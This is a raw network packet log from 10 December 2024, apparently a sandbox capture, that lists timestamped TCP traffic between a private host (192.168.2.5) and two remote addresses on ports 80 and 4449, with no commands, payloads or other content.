Dec 10, 2024 11:11:18.242878914 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.242923021 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.243036032 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.243082047 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.244782925 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.244824886 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.244879007 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.244920969 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.246680021 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.246721983 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.246800900 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.246843100 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.248606920 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.248650074 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.248711109 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.248753071 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.250515938 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.250561953 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.250788927 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.250827074 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.252394915 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.252445936 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.252499104 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.252542973 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.254326105 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.254379034 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.254470110 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.254507065 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.256225109 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.256273985 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.256334066 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.256387949 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.258191109 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.258233070 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.258265018 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.258308887 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.260077000 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.260119915 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.260154009 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.260227919 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.262033939 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.262077093 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.262109995 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.262151957 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.263930082 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.263973951 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.264046907 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.264094114 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.265747070 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.265789032 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.265958071 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.266000986 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.267733097 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.267780066 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.267791986 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.267832041 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.269576073 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.269619942 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.269705057 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.269751072 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.271456003 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.271497011 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.271564007 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.271605968 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.273391008 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.273432016 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.273490906 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.273533106 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.275264025 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.275309086 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.275377035 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.275420904 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.277183056 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.277225971 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.277288914 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.277331114 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.279109955 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.279155016 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.279176950 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.279242039 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.331445932 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:18.335900068 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:18.374962091 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.375005960 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.375134945 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.375134945 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.375524044 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.375576973 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.375619888 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.375663996 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.377445936 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.377466917 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.377490997 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.377511978 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.379463911 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.379509926 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.379539013 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.379585981 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.381278038 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.381326914 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.381355047 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.381402016 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.383114100 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.383168936 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.396435022 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.396476030 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.396486998 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.396672964 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.397193909 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.397242069 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.397304058 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.397352934 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.399008989 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.399059057 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.399087906 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.399133921 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.400687933 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.400728941 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.400785923 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.400830984 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.402303934 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.402350903 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.402396917 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.402437925 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.403961897 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.404006004 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.404006958 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.404042959 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.405612946 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.405654907 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.405726910 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.405769110 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.407262087 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.407303095 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.407341003 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.407385111 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.408992052 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.409043074 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.409071922 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.409126997 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.410543919 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.410603046 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.410643101 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.410681963 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.412257910 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.412292004 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.412307024 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.412321091 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.413847923 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.413892984 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.413918972 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.413965940 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.415505886 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.415546894 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.415626049 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.415668964 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.417181015 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.417226076 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.417289019 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.417335987 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.418987989 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.419034958 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.419035912 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.419076920 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.420562029 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.420608044 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.420676947 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.420722008 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.422189951 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.422241926 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.422261953 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.422353029 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.423779964 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.423825979 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.423906088 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.423959017 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.425460100 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.425527096 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.425537109 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.425584078 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.427069902 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.427126884 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.427196026 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.427264929 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.428719997 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.428796053 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.428860903 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.428922892 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.430402040 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.430452108 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.430541992 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.430598974 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.432018042 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.432117939 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.432187080 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.432243109 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.433708906 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.433765888 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.433799028 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.433871984 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.435334921 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.435405016 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.435441971 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.435502052 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.436995983 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.437045097 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.437104940 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.437170029 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.438853025 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.438922882 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.438996077 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.439043999 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.440279961 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.440376043 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.440382004 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.440429926 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.442007065 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.442066908 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.442105055 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.442167997 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.443603039 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.443677902 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.443741083 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.443789959 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.445256948 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.445353985 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.445353985 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.445400000 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.446917057 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.446995020 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.447005987 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.447052002 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.448571920 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.448628902 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.448678017 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.448678017 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.450414896 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.450488091 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.450501919 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.450546026 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.451872110 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.451947927 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.451983929 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.452030897 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.453536987 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.453587055 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.453672886 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.453737020 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.455172062 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.455213070 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.455223083 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.455224037 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:18.455251932 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.456824064 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.456872940 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.456957102 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.457011938 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.458472013 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.458534002 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.458606958 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.458666086 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.460110903 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.460239887 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.460251093 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.460288048 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.461770058 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.461822033 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.461879969 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.461932898 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.463444948 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.463489056 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.463512897 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.463553905 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.465089083 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.465140104 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.465189934 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.465231895 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.466715097 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.466774940 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.466803074 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.466876030 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.468370914 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.468425035 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.468430042 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.468472004 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.470051050 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.470097065 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.470160961 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.470208883 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.471664906 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.471740007 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.471774101 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.471833944 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.473319054 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.473370075 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.574970961 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.575038910 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.575048923 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.575129986 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.575675011 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.575726032 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.575782061 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.575828075 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.577120066 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.577169895 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.577297926 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.577353954 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.578840971 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.578890085 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.588350058 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.588402033 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.588495016 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.588555098 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.589024067 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.589083910 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.589148998 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.589196920 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.590321064 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.590430975 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.590446949 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.590497017 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.591643095 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.591698885 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.591732025 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.591785908 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.592962027 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.593010902 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.593075991 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.593126059 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.594320059 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.594381094 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.594435930 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.594486952 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.595541954 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.595597982 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.595635891 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.595681906 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.596848011 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.596894026 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.597001076 CET	80	49850	185.215.113.16	192.168.2.5
